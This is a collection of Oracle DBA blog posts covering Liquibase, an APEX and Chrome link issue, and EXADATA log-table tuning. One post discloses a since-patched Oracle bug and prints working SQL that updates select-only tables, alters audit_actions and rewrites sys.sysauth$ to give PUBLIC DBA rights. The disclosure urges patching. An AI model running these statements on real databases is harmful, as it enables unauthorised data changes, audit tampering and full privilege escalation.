Reports of this blogs death have been greatly exaggerated. It has been very quiet here though while I worked on getting the Swedish part of Miracle started. It is now rocking the Stockholm market so it’s time to get back into more geeky stuff.
Talking of which. I have encountered Liquibase for database versioning time after time and always come to the conclusion that it is not what a DBA want to use. I recently took it out for a spin to prove once and for all that it is not capable of what real DBAs need.
Well, lets just say that it did not end like I expected. The phrase, an old dog learns a new trick comes to mind. Once I got over the idea that it is the DDL I have to protect and realised that it is rather control over how changes occur I need. In fact I get all the control I need and a lot of problems with being able to back out changes and to adopt for different kinds of environments and/or database types are easily handled.
Do take it out for a spin, you’ll like it.
If you read Swedish, I wrote a document with a full demo of lots of the features. You find it here. It is a long document, partly because it has a long appendix with a changelog and partly because I step through each change (of 37) and explain them.
I also show how APEX applications can be installed with Liquibase. This is often said to not work, you have to do it by hand with APEX. Well, not only is it possible – it is easy.
I’d translate the demo and the document to English if that would be useful to many people. Let me know if this sounds like a document you’d like to see in English.
A friend and at the time co-worker at Kentor AB found this bug. He found the bug and had the tenacity to track down and prove that it was a bug and not just a flaw in the logging mechanism where this first was indicated to occur.
Today is the day when I can finally speak about a bug I asked for a peer review on over a year ago. I had to pull that blog post offline when it was clear that we had in deed found what I think is a monster bug. It was difficult to fix so while it was quiet online about the bug, Oracle was hard at work on fixing it. In fact it turned out to be two different bugs each plugged separately.
Before we get to the meat of the issue, have you applied the January 2014 CPU? No? OK, we’ll wait while you take care of that. Trust me, you want to have it installed. Back already? Good. Patching really doesn’t take too long. :-)
I’ve spent a number of years trying to very diligently apply the correct grants for different users to make sure every user had just what they needed. It turns out it was a wasted effort. Had the users known about this bug, they could have circumvented their lack of access. Truth be told, I really have no idea if someone did. In fact the bug was such that it was abused in production at a large Oracle shop by mistake. This bug is present in all versions of the database (as far as we know) and it has been fixed with the latest CPU for 11g and 12c. If you run on an older version, you should upgrade now! Running older than 11 at this point probably means you’re not reading blogs about databases anyway.
So what exactly is the bug then? In short, you can update data in tables you only have select rights on. How can that be, you’ve tested that multiple times. True, the SQL has to be written in a pretty specific way to trigger the bug. In a database that is a base install or at least predates the january CPU, the following test case should prove the issue. You can use most of this to verify the problem, you will probably not ant to test with privilege escalation in a production system though.
Let us first create som users for our test.
drop user usra cascade;
create user usra identified by usra default tablespace users;
alter user usra quota unlimited on users;
grant connect to usra;
grant create table to usra;
drop user usrb cascade;
create user usrb identified by usrb;
grant connect to usrb;
grant create view to usrb;
drop user usrc cascade;
create user usrc identified by usrc;
grant connect to usrc;
grant select any dictionary to usrc;
We create a user usra that can create tables, usrb that can create views and usrc that can only select from the dictionary. These users will allow us to test the different versions of this bug in a controlled fashion.
Lets set up a test table in the usra account.
create table t1 (col_a varchar2(10) not null);
insert into t1 (col_a) values ('Original');
grant select on t1 to usrb;
We now have a table with a single row that usrb can only read from, or so we would think. Let us first create a very basic view and try to update it.
drop view view1;
create view view1 as select * from usra.t1;
update view1 set col_a = 'Whoops1';
So that didn’t work. Or rather, the view was created but the update failed. That is how it should be, we have no update access on the table.
Lets now try to create a view on that view which we then update to see what happens if we add just a little bit of complexity to this.
drop view view2;
create view view2 as select * from view1 where col_a in (select max (col_a) from view1 group by col_a);
update view2 set col_a = 'Whoops2';
This update suddenly works (before the above mentioned CPU). So our meticulously granted privileges are overridden by a view with a sub-select on the same view. Not good.
Could the sub-select be simplified? Does it need to select from the same view and is an aggregation needed to make this bug expose itself?
drop view view3;
create view view3 as select * from view1 where 1 in (select 1 from dual);
update view3 set col_a = 'Whoops3';
Apparently it could not be simplified enough to just do a sub-select from dual. On to other possible simplifications.
What if we just read a hard-coded value from the first row in the table, would that work?
drop view view4;
create view view4 as select * from view1 where 1 in (select 1 from view1 where rownum = 1);
update view4 set col_a = 'Whoops4';
Yup, that is enough to break through the privileges.
How about just using a select without even having to have the right to create a view?
(with x as (select * from usra.t1) select * from x) t1
set col_a = 'Whops5';
Ouch. That too was possible. So all it takes is a select access on a table and we can update it. How do we stop someone from abusing this when not even a pure select with no right to create objects is enough? You see why we pulled the original blog-post? This was for a time something that would be very hard to defend your database against.
How about using it to update things in the data dictionary, yes that too is possible. Some things are available to any user such as user_actions.
(with x as (select * from audit_actions) select * from x) t1
set name = 'Mathias was here';
This update also works. So auditing can be changed, probably not a good thing if you trust your audit_actions table.
How about escalating the privileges we have (or rather that anyone has). Yes, that is also possible with a bit of knowledge.
select * from sys.sysauth$
where grantee# = (select user_id from all_users where username = 'HR')
and rownum = 1;
Here we steal a privilege held by the HR user, probably a privilege that will not be missed for a long time in most databases. With this we will make public a proper DBA user meaning that any account can do almost anything in the database.
(with x as (select * from sys.sysauth$ where grantee# = 103 and privilege# = -264 and sequence# = 1551)
select * from x) t1
set grantee# = 1
,privilege# = 4;
Just like that we have given ourselves and everyone else DBA access. Now we can do whatever we want including covering our tracks in most databases.
So I ask again, are you *really* sure that your database is secure?
This is scary stuff and this only goes to show that even a mature product needs to be kept up with current patches. If you are not on a CPU from this year, PLEASE give it a high priority to make it happen today.
And PLEASE do not test this in production. If you do and your DBA catches you, he will lecture you forever if not reporting you up the chain of command. But please do spread the word that this issue exists and needs to be plugged ASAP.
Time to get back into blogging. I stopped a while ago and the reason was two-fold. As I was leaving my job at Kentor AB I wanted to avoid any concerns with what I wrote while my three month long two week notice played out. The other reason was that once I had left life got really busy both with work for my client as well as with the new adventure I had departed on.
The new adventure is to bring the Miracle brand to Sweden. I will try to build up an Oracle database focused team here in Stockholm based on the success Miracle A/S has had in Denmark. Yes it is equally exciting as it is scary for someone who has lived their life in medium to large scale consulting practices.
However, I have always had a big admiration for the guys who started Miracle and what they have achieved. Getting a chance to bring the same style and quality to my home market of Stockolm and Sweden was just an offer that was too good to pass up. That is the kind of opportunities most of us will only get once or twice in a career. This one came at a time where it was close enough to work with everything else that was going on. The one thing that may not be optimal is having a new house built at the same time. Actually, that makes it completely not optimal. But the phrase I keep repeating to others that are thinking about when the best time to get started is “There is no time such as the present”, so I took my own advice for once.
So now the work is on getting the Oracle practice going, or rather it is going it just needs a few more legs. And with legs I mean consultants.
Next is however partying with our colleagues down in Copenhagen close to the headquarters. Tomorrow evening is when the Christmas party kicks off. Who knows when it will end. :-)
This blog will soon return to a more technical program. thought probably with some posts on interesting things with starting up a company. I’m sure the next year will teach us a lot of things on how to do that.
About that, this hiring business… When is the best time to add more people to a small company and how do we manage risk? Well… ehhh… Yeah… That’s right there is no best time, but there is no time such as the present.
So calling Google Reader dead may be a bit premature, but Googles announcement of their intention to kill their baby all but killed it. On monday it is RIP for the reader. I’ve gone through disbelief to mourning the loss to a search for a replacement that best emulates what Google Reader does.
In the end I decided to not just find something that just replaces it with a new tool providing the same exact feature only with a different name.
If I had to find a different tool, I might as well try to find something better. The fact is that although Google Reader was one of my favorite Google tools, I did not use it. Yes, it is a bit odd that I’m writing a post about replacing a tool I didn’t use. And when I say that I didn’t use it, I use the term “did not” very recklessly. The fact is that I could not read all the blog I follow without it. Google Reader had however turned into an infrastructure piece for me. I used it to collect the posts and keep track of what I had read, but the tool of my choice for reading was the Reeder. Unless you are familiar with it, it may seem like I just referred to the Google Reader again, but it is spelled differently and this is a wonderful tool for reading blogs and it uses the Google Reader to manage the blogs and lets Google Reader track which posts are read and which are not.
If the Reeder is such a wonderful app, why not keep using it. At first I thought of abandoning it as Google Reader was going away. But it turns out the Reeder will continue to work (or so they claim). It supports Feedbin and possibly even feedly in the future. There has not been much talk about it on their own website or even on their twitter account. There are lots of fans asking what is going on, scarcely little from @reederapp themselves.
I started thinking of how I consume text these days. I do still surf on a computer, but it is when looking for something. I prefer reading on my iPad. My workflow has actually changed such that when I find a great article or blog post, I flip it so I later can read it in Flipboard on the iPad. If the article is worth saving for the future after having read it I add it to Evernote. As that is my workflow for things I do not have to read right now, why should my workflow for reading blogs be any different? After all, I read them when time allows.
After that epiphany I took a look at Flipboard wondering if I could get a similar tool for reading blogs on the iPad. It turns out I can, they have ceased the opportunity Google created. You can now read your blogs in the tool we all love. Getting my blogs to Flipboard has made them seem so much more enjoyable. It integrates with Google Reader so it imports all the blogs you have there and lets you follow the same blogs.
The one thing that can be confusing is that after opting to read your blogs in flipboard, you will want to go into the settings for Google Reader in Flipboard and possibly turn on to have number of unread items indicated, to set posts you read in Flipboard to read and to show only unread posts. I have them all set to ON and it works very well with the way I want to read my blogs.
For me reading blogs on the iPad is so much more enjoyable than to try to catch up in the browser on the computer. The latter never happens and I tend to fall far behind and have to set aside a few hours to catch up, since moving my blog reading to Flipboard I have stayed current on all blogs I read.
If you haven’t found a way to read your blogs yet that you really love, give Flipboard a try. I think you’re gonna love it.
You know how it is, when you have that feeling. You are on top of your game. You have a few quick brush strokes to add to a system to make it more dynamic. You have all the small needed changes in your head and you know it is just gonna work. You sit down for some quality time with your computer and with the application builder. It’s gonna be fun and you will get to bask in the glow of your success before the day is over. yup, that is the feeling I’m talking about.
Then there is that other feeling, then one we want to avoid. You know the kind. When you have an easy fix to do. It all goes well until it doesn’t. And then, nothing. You turn the know this way, nothing. You turn the know that way, nothing. You turn it up, you turn it down. No matter what. The same freaking result. And it is the wrong result. Time goes by, what was embarrassing after 15 minutes is annoyingly embarrassing after a couple of hours. Yes, that is the feeling I’m referring to.
Worst of all is of course when the first feeling turns into the second feeling. That is an afternoon that is sure to suck, and the more it sucks the more you get annoyed that you cannot see what is sure to be a very obvious mistake.
A day a few weeks ago I had this happen to me for the umpteenth time. Not with the same issue of course, but with one of those ridiculous things that just throws you out of your flow. What was a magical afternoon changed to one where I felt like a complete beginner.
It all started very innocent with me needing to add a table where I could store the location of different places a tab should point to. So I had an application item, I had a process that would populate it on new instances(sessions) and I had referenced that application item in the link target. The target returned was set to be “127.0.0.1:8080”. A target as good as any…
It didn’t show up in the link from the tab. It however was available so it could be displayed on a region on the same page. What the ….
Could it really be that APEX creates the HTML text for the tab before the application processes runs? It just doesn’t make sense, a test of hard coding the value to “abc” in the application process proved that it in fact ran before.
Could it be that a value passed in from the process was treated differently for tabs or application processes? I doubted it, but facing odd issues one tends to consider all kinds of illogical things. But hardcoding “abc” in the process once again showed that it came through to the tab.
What on earth. A friend tested the same page on his Mac and (fortunately?) got the same exact result. So it wasn’t my browser that was acting up.
Now we were really stretching and started looking at the page rendered in Safari and Firefox. What on earth, the link shows up just fine in them?
We’re considering a bug in APEX. I have read about things they have had to do to make IE, Chrome, Firefox, Safari, and Opera work well with APEX applications. Could there be a bug in there with how links with dynamic values were treated? It certainly was possible. If it wasn’t for the fact that some links showed up just fine, the “abc” one looked like a page on the same ip-address as the APEX server when looking at where Chrome wanted to send us. So it really wasn’t reasonable that APEX would have a bug related just to localhost adresses.
After some more coffe it dawned on me, maybe this wasn’t APEX at all. Maybe this was a “feature” of Chrome. After a peek in the source for the rendered page, the text “127.0.0.1:8080” was found in the link attribute for the tab. So APEX renders it like I expected, but Chrome didn’t honor it as a link.
It turns out that if there’s just text, then Chrome will assume it is a relative document located downstream from the DocumentRoot. However, if it is not a path that can be parsed as file system location, then Chrome will not allow the link to be used. What was needed was to put http:// in front of the address. That should of course be there to be a well formed URL. I just expected it to show up when hovering over the link anyway just as it does in other browsers.
It would be nice if Chrome rather than just linking to “blank” would link to a page somewhere that just said that it was a malformed URL. However, the solution took seconds to implement while the troubleshooting took WAY longer than it should have. Even worse two senior troubleshooters was stumped on this for a very long time.
So if you end up with an empty link in your APEX application, or any other web page for that matter, you know that it is most likely the result of having a malformed URL rendered in Chrome.
So yes I started of with the first feeling and feeling good about myself, quickly started the downward spiral of the second feeling. That day never really got back up to the first happy feeling again. Happy with having solved the issue, but not nearly feeling on top of my game when the day ended. Oh well, there will be more days to convince myself that I might be on top of my game (at least sometimes).
This is the last post in this series and I’ll not introduce anything new here, but rather just summarise the changes explained and talk a bit about the value the solution delivers to the organisation.
Let’s first review the situation we faced before implementing the changes.
The cost of writing the log-records to the database was that all the parallell writing from many different sources was such that it introduced severe bottlenecks to the point that the logging feature had to be turned off days at a time. This was not acceptable but rather than shutting down the whole system which would put lives in immediate danger, this was the only option available. Then even if that would have been fast enough, the moving of data was taking over twice the time available and it was fast approaching the point where data written in 24 hours would take more time to move to the historical store for log-data. That would of course have resulted in an ever growing backlog even if the data move was on 24×7. On top of that the data took up 1.5 TB of disk space, costing a lot of money and raising concerns with out ability to move it to EXADATA.
To resolve the issue during business hours of having contention causing a crippling impact on the overall system, we changed the table setup to not have any primary keys, no foreign keys and no indexes. We made the tables partitioned such that we get one partition per day.
To make the move from operational tables to historical tables faster, we opted to have both in the same instance on EXADATA. This allowed us to use partition exchange to swap out the partition from the operational table and swap it into the historical table. This took just a second as all we did was updating some metadata for which table the partition belongs to. Note that this ultra fast operation replaced a process that used to take around 16 hours, for which we had 6.5 and the time it took was expanding as business was growing.
Finally, to reduce the space consumed on disk we used HCC – Hybrid Columnar Compression. This is an EXADATA only feature for compressing data such that columns with repeating values gets a very good compression ratio. We went from 1.5 TB to just over 100 GB. This means that even with no purging of data it would take us over five years to even get back to the amount of storage this used to require.
So in summary
- During business hours we use 20% of the computing power and even less of the wall clock time it used to take,
- The time to move data to the historical store was reduced from around 16 hours to less than one second.
- Disk space requirement was reduced from 1.5 TB to just over 100 GB.
And all of this was done without changing one line of code, in fact there was no rebuild, no configuration change or anything to allow this drastic improvement to work with all the different systems that was writing to these log-tables.
One more thing to point out here is that all these changes was done without using traditional SQL. The fact that it is an RDBMS does not mean that we have to use SQL to resolve every problem. In fact, SQL is often not the best tool for the job. It is also worth to note that these kinds of optimisations cannot be done by an ORM, it is not what they do. This is what your performance or database architect needs to do for you.
For easy lookup, here are links to the posts in this series.
- Writing log records
- Moving to history tables
- Reducing storage requirements
- Wrap-up (this post)
Reducing storage requirements
In the last post in this series I talked about how we sped up the move of data from operational to historical tables from around 16 hours down to just seconds. You find that post here.
The last area of concern was the amount of storage this took and would take in the future. As it was currently taking 1.5 TB it would be a fairly large chunk of the available storage and that raised concerns for capacity planning and for availability of space on the EXADATA for other systems we had plans to move there.
We set out to see what we could do to both estimate max disk utilisation this disk space would reach as well as what we could do to minimize the needed disk space. There were two considerations minimize disk utilisation at the same time as query time should not be worsened. Both these were of course to be achieved without adding a large load to the system, especially not during business hours.
The first attempt was to just compress one of the tables with the traditional table compression. After running the test across the set of tables we worked with, we noticed a compression ratio of 57%. Not bad, not bad at all. However, this was now to be using an EXADATA. One of the technologies that are EXADATA only (to be more technically correct, only available with Oracle branded storage) is HCC. HCC stands for Hybrid Columnar Compression. I will not explain how it is different from normal compression in this post, but as the name indicates the compression is based around columns rather than on rows as traditional compression is. This can achieve even better results, at least that is the theory and the marketing for EXADATA says that this is part of the magic sause of EXADATA. Time to take it out for a spin.
After having set it up for our tables having the same exact content as we had with the normal compression, we had a compression rate of 90%. That is 90% of the needed storage was reduced by using HCC. I tested the different options available for the compression (query high and low as well as archive high and low), and ended up choosing query high. My reasoning there was that the compression rate of query high over query low was improved enough and the processing power needed was well worth it. I got identical results on query high and archive low. It took the same time, resulted in the same size dataset and querying took the same time. I could not tell that they were different in any way. Archive high however is a different beast. It took about four times the processing power to compress and querying too longer and used more resources too. As this is a dataset I expect the users to want to run more and more queries against when they see that it can be done in a matter of seconds, my choice was easy, query high was easily the best for us.
How do we implement it then? Setting a table to compress query high and then run normal inserts against it is not achieving a lot. There is some savings with it, but it is just marginal compared to what can be achieved. For HCC to kick in, we need direct path writes to occur. As this data is written once and never updated, we can get everything compressed once the processing day is over. Thus, we set up a job to run thirty minutes past midnight which compressed the previous days partition. This is just one line in the job that does the move of the partitions described in the last post in this series.
The compression of one very active day takes less than two minutes. In fact, the whole job to move and compress has run in less than 15 seconds for each days compression since we took this solution live a while back. That is a time well worth the 90% saving in disk consumption we achieve.
It is worth to note that while HCC is an EXADATA feature not available in most Oracle databases, traditional compression is available. Some forms of it requires licensing, but it is available so while you may not get the same ratio as described in this post you can get a big reduction in disk space consumption using the compression method available to you.
With this part the last piece of the puzzle fell in place and there were no concerns left with the plan for fixing the issues the organisation had with managing this log data. The next post in this serie will summarise and wrap up what was achieved with the changes described in this serie.
Moving to history tables
In the last post I talked about how we made the speed of actually writing all those log-records much faster. It has to date been so fast that no a single report of a problem has been filed. you find that post here.
Once the data was written to the log-tables, it had to be moved to the history tables.This was a process that took around 16 hours. It was never allowed to run for that long as it had to be stopped before the business day started.
This move was done from an instance on EXADATA to a database on an old server. Yes, I can hear you all think “AHA! It must be the slow database link.”. That was the leading thought when I started looking at it. And yes it sure was slow, but no it was not having a big impact. The other area that had been tuned and tweaked over and over and over and … was the insert over the database link to the history tables. Sure enough it was taking a long time. However measuring it showed that it only accounted for 20% of the total time. Reducing that would let us save over three hours. While that would be good, where did the rest of the time go?
It went to a place no one had suspected. Nor tweaked Nor had any measurements been made. What else is new?
It was the part of the process that was EXADATA only. It was the delete of the rows that had been moved. Huh? How could this be? Well it turns out that deleting data based on an in-clause was not as fast as one would think (or at least want). The process was based on selecting a set of primary key values and putting them into a temporary table, this table was then used to identify rows to insert into the history table and to delete rows.
Yes, there are quite a few things in this process that one could attempt to optimise However, no matter what, the speed would probably not be fast enough. If it ended up being, would it handle the projected growth of the business? And is there really no better way than essentially row by row processing?
Sure there is. Sometimes SQL is not the best or only tool at our disposal.
Everything doesn’t have to be done with SQL. ™
We had already removed the indexes, so the delete should now be faster. It was, just barely fast enough. Thus, just with that change we had squeezed into the seemingly unattainable window for this process. But business is growing and we would within weeks be back to tuning and tweaking.
Back to the idea of not using SQL for everything. But first, let’s revisit the approach that led to success with the write speed. What assumptions are made that we can question? Well… Why are we writing this data over a database link to the slowest database we have in our production environment? It has always been that way and yes we’re worried about the impact of doing this on the EXADATA. Both the impact of letting ad-hoc searches be made as well as the impact of storing all this data on the EXADATA. The storage concern is well founded as the log-data takes up close to 1.5 TB and the volume of logs written are increasing.
However, when we question this we all agree that these are assumed problems and assumed solutions to those problems. Based on that a PoC is produced to show what would happen if we could keep the historic log data in the same database instance on the EXADATA.
With the historic tables in the same database, we get a whole new set of tools to use. I build a PoC showing how data can be moved from the operational tables (the one logs are written to) to the historic ones in under a second for the whole days volume. To achieve this I partition the table on range where the partition key is the time when the log was inserted. Next part is to use a technology in the database called exchange partition.
When exchanging a partition, no data is actually moved. The partition with todays data is via exchange partition moved from table A to table B. However, this move is only updating metadata in the database. That is to say that the only change was to specify which table the partition belongs to. The rows in the partition remains in the same exact physical location on disk as they were from the beginning. They are not changed, not read, and not touched in any way.
This is what makes such a move so fast. Even better, it is transactionally safe. If a query started while it belonged to table A, it will be read even though it was moved to another table in the middle of that query. Queries on table A that starts after the move will of course not see the moved data at all.
Sub-second moving data of millions or billions rows is something that cannot be done with SQL no matter how much one tunes the SQL. So again, SQL is not the only tool at your disposal.
With this we proved that the process can be fast enough. I have not discussed it here, but during this process we also showed that the ad-hoc searches was of no concern either. EXADATA smart scan handles the actual ad-hoc queries very well and most of them are actually sub-second response time even with no indexes. This is for 1 billion+ row tables. Yes smart scan is one part of it and storage indexes is another. I will not discuss those in these posts, but take my word for it, when the time they took were presented the concern was immediately forgotten.
In the next post in this series, I will discuss how we dealt with the concern over the amount of disk space we would use now and in the future if we let the historic data stay on the EXADATA.
Writing log records
The last post in this series introduced the problem briefly. You find that post here.
In this post I’ll talk about the changes made to make that writing of log records fast enough. There were 50 million records that was written. Each of them pretty much in its own transaction. Of course the commit activity caused problem, as did log buffer issues. Some of this could be somewhat remedied with configuration.
The big issue though was that the writes themselves took too much time and too often many session ended up in long contention chains. Yes, it would have been great to have the luxury of redesigning the whole logging situation from the ground up. But, as is often the case, the solution was built such that all systems connecting were implemented in such a way that redesigning was not an option. Fixing the performance of this had to be done without requiring code changes to the systems performing the logging. Oh, joy.
So what caused the problem then? For the inserts it was pretty straight forward. Too many transactions making an insert and a commit. This caused indexes to be hotspots where all processes wanted to write at the same spot. Hash-partitioning had been introduced and that had led to less contention but slower performance. As the partitions existed on different parts on the disks the write head had to be constantly moved and that caused slower service times.
What could we do to make a big improvement while not affecting the code? We’re not talking about just 10-20% of improvement on any area in this case, and even more important was to make the performance stable. That is, the most important thing was to ensure that there were no spikes where an insert suddenly to 20 times longer than usual. The contention chains that was occurring made performance spike such that the whole system became unusable.
The solution here turned out to be something so far from advanced technologies as questioning assumptions. The first time I asked “why do we have these indexes”, most people in the room thought I was just joking around. Eventually they realised that I was serious. After an amusing period of silence where I could see them thinking “Do we need to inform him that indexes are needed to enforce uniqueness and to support referential integrity?”, someone went ahead and did just that. OK, now we were on to a productive discussion, as of course that wasn’t what I meant. The followup discussion about why we needed referential integrity and uniqueness for this set of data was very enlightening for everyone. To make a long story short, it was not needed at all. It was there because it had always been there and nobody had questioned the need before.
How come we didn’t need data to be unique? Well, this is log-data. That is it tells us what actions has been performed by the system. If some activity would be reported twice, it really wouldn’t be the end of the world. The possible problem that some activity isn’t logged cannot be handled with defining unique constraints. That is pure system design and nothing I could improve or worsen by removing some indexes.
Thus, the indexes was removed together with the foreign keys (referential integrity).
Sounds simple enough, but did it help? Did it ever! In one month after making the change, there has not been one report of one transaction that was anywhere close to take too long. This simple solution made the logging so fast that it is no longer a concern.
The next post in this series will discuss the solution for moving data to the history tables. This process took around 16 hours and it had to become at least three times as fast. As you’ll see, moving all these rows can be done much faster than so.
In my work among other things I tune and tweak solutions for EXADATA. Today I’ll write about a big improvement we achieved with a process that moves data from the operational tables to the ones where the history is stored.
This will not be a technical post. While I talk about using advanced technologies, I will not discuss code or deep details of them in this post.
And yes, when I say post, I mean a series of posts. This will be too long to be a single post. I’ll break it up into an introduction and then a post on each area of improvement.
Let’s first discuss the before situation. This set of tables are logged to during the day. These log records are needed both to investigate how transactions were executed as well as to satisfy legal requirements. It is in a highly regulated industry and for good reason as mistakes could put someone’s life in danger.
In this situation the solutions were writing around 50 million log records per day to five tables. These tables all had a primary key based on a sequence and there was also referential integrity set up. This means that for the indexes, all processes were writing to the same place on disk. The lookup on the referential integrity was also looking at the same place. An attempt to remedy some of this had been made by hash partitioning the tables. The write activity was intense enough during the day that most of the logging had to be turned off as the solution otherwise was too slow. This of course has legal as well as diagnostic implications.
What’s worse is that once all that data was written, it had to be moved to another database where the history is kept. This process was even slower and the estimate for how long it would take to move one days worth of data was 16 hours. It never did run for that long as it was not allowed to run during the day, it had to start after midnight and finish before 7 am. As a result the volume built up every night until logging was turned off for a while and the move then caught up a little every night.
This series will have the following parts:
- Introduction (this post)
- Writing log records
- Moving to history tables
- Reducing storage requirements
- Wrap-up and summary
The plan is to publish one part each week. Hopefully I’ll have time to publish some more technical posts between the posts in this series.